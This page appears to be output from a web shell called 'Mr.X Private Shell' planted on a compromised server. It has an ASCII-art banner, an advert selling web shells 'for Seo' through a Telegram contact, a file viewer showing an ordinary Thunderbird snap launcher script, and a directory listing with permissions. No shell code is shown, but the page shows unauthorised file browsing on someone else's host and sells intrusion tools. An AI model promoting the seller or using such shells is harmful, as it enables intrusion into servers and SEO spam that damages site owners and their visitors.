__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh
REALHOME=$(getent passwd $(id -u) | cut -d ':' -f 6)
# Keep using profile in ~/.thunderbird if it is there by symlinking to it.
SNAPDOT="$SNAP_USER_COMMON/.thunderbird"
HOMEDOT="$REALHOME/.thunderbird"
if [ ! -d "$SNAPDOT" ] && [ -r "$HOMEDOT/profiles.ini" ]; then
ln -s "$HOMEDOT" "$SNAPDOT"
fi
exec "$SNAP/usr/lib/thunderbird/thunderbird-bin" "$@"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| bin | Folder | 0755 |
|
|
| data-dir | Folder | 0755 |
|
|
| etc | Folder | 0755 |
|
|
| gnome-platform | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| meta | Folder | 0755 |
|
|
| snap | Folder | 0755 |
|
|
| usr | Folder | 0755 |
|
|
| patch-default-profile.py | File | 2.9 KB | 0755 |
|
| thunderbird.launcher | File | 369 B | 0755 |
|